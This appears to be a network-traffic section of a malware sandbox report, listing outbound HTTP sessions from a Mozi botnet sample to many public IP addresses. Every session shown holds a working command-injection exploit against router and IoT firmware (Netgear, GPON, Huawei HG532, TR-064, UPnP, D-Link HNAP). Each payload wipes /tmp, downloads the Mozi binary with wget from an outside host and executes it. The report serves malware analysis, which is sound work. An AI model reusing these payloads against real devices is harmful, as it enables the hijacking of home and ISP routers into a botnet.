6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://192.168.1.1:8088/Mozi.m; chmod +x Mozi.m; ./Mozi.m</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              58192.168.2.233503861.237.100.818080
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.264147043 CET185OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              59192.168.2.233387048.214.85.135555
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.264172077 CET811OUTPOST /UD/act?1 HTTP/1.1
                                                              Host: 127.0.0.1:5555
                                                              User-Agent: Hello, world
                                                              SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                              Content-Type: text/xml
                                                              Content-Length: 640
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3f 3e 3c 53 4f 41 50 2d 45 4e 56 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 4f 41 50 2d 45 4e 56 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 53 4f 41 50 2d 45 4e 56 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 75 3a 53 65 74 4e 54 50 53 65 72 76 65 72 73 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 64 73 6c 66 6f 72 75 6d 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 54 69 6d 65 3a 31 26 71 75 20 6f 74 3b 3e 3c 4e 65 77 4e 54 50 53 65 72 76 65 72 31 3e 60 63 64 20 2f 74 6d 70 20 26 26 20 72 6d 20 2d 72 66 20 2a 20 26 26 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 20 26 26 20 63 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              60192.168.2.2345240161.199.124.14552869
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.264189959 CET886OUTPOST /picsdesc.xml HTTP/1.1
                                                              Content-Length: 630
                                                              Accept-Encoding: gzip, deflate
                                                              SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                              Accept: /
                                                              User-Agent: Hello-World
                                                              Connection: keep-alive
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 30 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://192.168.1.1:8088/Mozi.m; chmod +x Mozi.m; ./Mozi.m</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              61192.168.2.2341436190.249.69.1068080
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.264213085 CET120OUTGET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcro
                                                              Data Raw:
                                                              Data Ascii:


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              62192.168.2.235488023.173.106.2780
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.264229059 CET328OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                              Host: 127.0.0.1:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: Hello, World
                                                              Content-Length: 118
                                                              Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30
                                                              Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              63192.168.2.2349094192.135.140.13580
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.264246941 CET185OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              64192.168.2.2354774204.81.207.1888080
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.264265060 CET334OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                              Host: 127.0.0.1:8080
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: Hello, World
                                                              Content-Length: 118
                                                              Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 38 30 26 69 70 76 3d 30
                                                              Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              65192.168.2.2360168220.15.89.1080
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.264278889 CET185OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              66192.168.2.2342514142.31.67.24437215
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.264314890 CET821OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                              Host: 142.31.67.244:37215
                                                              Content-Length: 601
                                                              Connection: keep-alive
                                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              67192.168.2.2338010221.42.76.517574
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.264338017 CET811OUTPOST /UD/act?1 HTTP/1.1
                                                              Host: 127.0.0.1:7574
                                                              User-Agent: Hello, world
                                                              SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                              Content-Type: text/xml
                                                              Content-Length: 640
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3f 3e 3c 53 4f 41 50 2d 45 4e 56 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 4f 41 50 2d 45 4e 56 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 53 4f 41 50 2d 45 4e 56 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 75 3a 53 65 74 4e 54 50 53 65 72 76 65 72 73 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 64 73 6c 66 6f 72 75 6d 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 54 69 6d 65 3a 31 26 71 75 20 6f 74 3b 3e 3c 4e 65 77 4e 54 50 53 65 72 76 65 72 31 3e 60 63 64 20 2f 74 6d 70 20 26 26 20 72 6d 20 2d 72 66 20 2a 20 26 26 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 20 26 26 20 63 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              68192.168.2.234401279.10.209.3449152
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.264374018 CET930OUTPOST /soap.cgi?service=WANIPConn1 HTTP/1.1
                                                              Host: 79.10.209.34:49152
                                                              Content-Length: 630
                                                              Accept-Encoding: gzip, deflate
                                                              SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                              Accept: */*
                                                              User-Agent: Hello, World
                                                              Connection: keep-alive
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 6d 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 6d 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget http://192.168.1.1:8088/Mozi.m;/tmp/Mozi.m dlink`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              69192.168.2.23552649.58.179.10980
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.264394045 CET328OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                              Host: 127.0.0.1:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: Hello, World
                                                              Content-Length: 118
                                                              Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30
                                                              Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              70192.168.2.235820229.105.29.15980
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.264414072 CET185OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              71192.168.2.2346432203.29.198.2087574
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.264435053 CET811OUTPOST /UD/act?1 HTTP/1.1
                                                              Host: 127.0.0.1:7574
                                                              User-Agent: Hello, world
                                                              SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                              Content-Type: text/xml
                                                              Content-Length: 640
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3f 3e 3c 53 4f 41 50 2d 45 4e 56 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 4f 41 50 2d 45 4e 56 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 53 4f 41 50 2d 45 4e 56 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 75 3a 53 65 74 4e 54 50 53 65 72 76 65 72 73 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 64 73 6c 66 6f 72 75 6d 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 54 69 6d 65 3a 31 26 71 75 20 6f 74 3b 3e 3c 4e 65 77 4e 54 50 53 65 72 76 65 72 31 3e 60 63 64 20 2f 74 6d 70 20 26 26 20 72 6d 20 2d 72 66 20 2a 20 26 26 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 20 26 26 20 63 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              72192.168.2.234574473.34.189.20280
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.264467955 CET802OUTPOST /HNAP1/ HTTP/1.0
                                                              Host: 73.34.189.202:80
                                                              Content-Type: text/xml; charset="utf-8"
                                                              SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                              Content-Length: 640
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              73192.168.2.2343002120.144.248.24581
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.264483929 CET170OUTGET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              74192.168.2.2351378113.145.142.2028080
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.264504910 CET334OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                              Host: 127.0.0.1:8080
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: Hello, World
                                                              Content-Length: 118
                                                              Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 38 30 26 69 70 76 3d 30
                                                              Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              75192.168.2.2353212150.246.65.11581
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.264519930 CET170OUTGET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              76192.168.2.2343836125.163.236.22680
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.264549017 CET804OUTPOST /HNAP1/ HTTP/1.0
                                                              Host: 125.163.236.226:80
                                                              Content-Type: text/xml; charset="utf-8"
                                                              SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                              Content-Length: 640
